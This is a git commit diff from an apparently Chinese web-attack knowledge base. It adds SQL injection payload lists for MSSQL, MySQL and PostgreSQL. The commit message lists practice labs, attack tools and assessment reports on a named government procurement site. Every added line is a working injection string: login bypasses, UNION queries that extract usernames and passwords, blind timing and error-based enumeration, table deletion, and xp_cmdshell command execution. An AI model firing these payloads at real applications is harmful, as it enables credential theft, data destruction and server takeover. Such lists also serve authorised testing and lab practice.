初始化: Web安全攻防知识库

- 靶场环境: DVWA/WebGoat/Pikachu/BWAPP/SQLi-Labs/XSS-Labs - SQL注入工具: sqli-scanner.py, blind-sqli.py, sqli-exploit.go - XSS工具: xss-fuzzer.py, xss-scanner.go - 认证攻击: web-brute.py, jwt-cracker.py - 服务端安全: port-scanner.py, tls-scanner.py - 防御配置: nginx-hardening.conf - 案例研究: 福建政采网安全评估报告 (13份) - 同步脚本: sync-gitea.sh
2026-03-16 17:10:23 -07:00
--- a/01-sql-injection/payloads/mssql.txt
+++ b/01-sql-injection/payloads/mssql.txt
@@ -0,0 +1,29 @@
+' OR '1'='1
+' OR '1'='1'-- -
+' OR 1=1--
+1' OR '1'='1
+admin'--
+' AND 1=1--
+' UNION SELECT NULL--
+' UNION SELECT 1,2,3--
+' UNION SELECT username,password,3 FROM users--
+'; DROP TABLE users--
+' WAITFOR DELAY '0:0:5'--
+' WAITFOR DELAY '0:0:5'-- -
+'; IF 1=1 WAITFOR DELAY '0:0:5'--
+'; IF (SELECT 1)=1 WAITFOR DELAY '0:0:5'--
+' AND 1=CONVERT(int,(SELECT @@version))--
+' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
+' AND 1=CONVERT(int,(SELECT TOP 1 name FROM master..sysdatabases))--
+' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
+' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
+' UNION SELECT NULL,username+'|'+password,NULL FROM users--
+' EXEC xp_cmdshell('whoami')--
+'; EXEC xp_cmdshell('dir')--
+' EXEC sp_executesql N'SELECT 1'--
+1 AND 1=1
+1 AND 1=2
+1 OR 1=1
+') OR ('1'='1
+') AND 1=1--
+') AND 1=2--
--- a/01-sql-injection/payloads/mysql.txt
+++ b/01-sql-injection/payloads/mysql.txt
@@ -0,0 +1,57 @@
+' OR '1'='1
+' OR '1'='1'-- -
+' OR '1'='1'/*
+' OR 1=1--
+' OR 1=1-- -
+' OR 1=1/*
+1' OR '1'='1
+1' OR '1'='1'-- -
+1' OR '1'='1'/*
+admin'--
+admin'-- -
+admin'/*
+' AND 1=1--
+' AND 1=1-- -
+' AND 1=2--
+' AND 1=2-- -
+' UNION SELECT NULL--
+' UNION SELECT NULL-- -
+' UNION SELECT NULL, NULL--
+' UNION SELECT NULL, NULL, NULL--
+' UNION SELECT 1,2,3--
+' UNION SELECT username,password,3 FROM users--
+' UNION ALL SELECT NULL--
+' UNION ALL SELECT 1,2,3--
+1' ORDER BY 1-- -
+1' ORDER BY 2-- -
+1' ORDER BY 3-- -
+1' ORDER BY 4-- -
+-1' UNION SELECT 1,2,3-- -
+-1' UNION SELECT username,password,3 FROM users-- -
+' AND SLEEP(5)--
+' AND SLEEP(5)-- -
+' AND IF(1=1,SLEEP(5),0)--
+' AND IF(1=1,SLEEP(5),0)-- -
+' AND BENCHMARK(10000000,SHA1('test'))--
+' AND BENCHMARK(10000000,SHA1('test'))-- -
+' WAITFOR DELAY '0:0:5'--
+' WAITFOR DELAY '0:0:5'-- -
+' AND pg_sleep(5)--
+' AND pg_sleep(5)-- -
+'; DROP TABLE users--
+'; DROP TABLE users-- -
+' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
+' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
+' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--
+' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
+1 AND 1=1
+1 AND 1=2
+1 OR 1=1
+1' AND '1'='1
+1' AND '1'='2
+" OR "1"="1
+" OR 1=1--
+') OR ('1'='1
+') OR ('1'='1'-- -
+') AND 1=1--
+') AND 1=2--
--- a/01-sql-injection/payloads/postgres.txt
+++ b/01-sql-injection/payloads/postgres.txt
@@ -0,0 +1,27 @@
+' OR '1'='1
+' OR '1'='1'-- -
+' OR 1=1--
+1' OR '1'='1
+admin'--
+' AND 1=1--
+' UNION SELECT NULL--
+' UNION SELECT 1,2,3--
+' UNION SELECT username,password,3 FROM users--
+'; DROP TABLE users--
+' AND pg_sleep(5)--
+' AND pg_sleep(5)-- -
+'; SELECT pg_sleep(5)--
+' UNION SELECT NULL,version(),NULL--
+' UNION SELECT NULL,current_database(),NULL--
+' UNION SELECT NULL,current_user,NULL--
+' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
+' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
+' AND 1=CAST((SELECT version()) AS INT)--
+' AND 1=CAST((SELECT current_database()) AS INT)--
+' UNION SELECT NULL,string_agg(column_name,','),NULL FROM information_schema.columns WHERE table_name='users'--
+1 AND 1=1
+1 AND 1=2
+1 OR 1=1
+') OR ('1'='1
+') AND 1=1--
+') AND 1=2--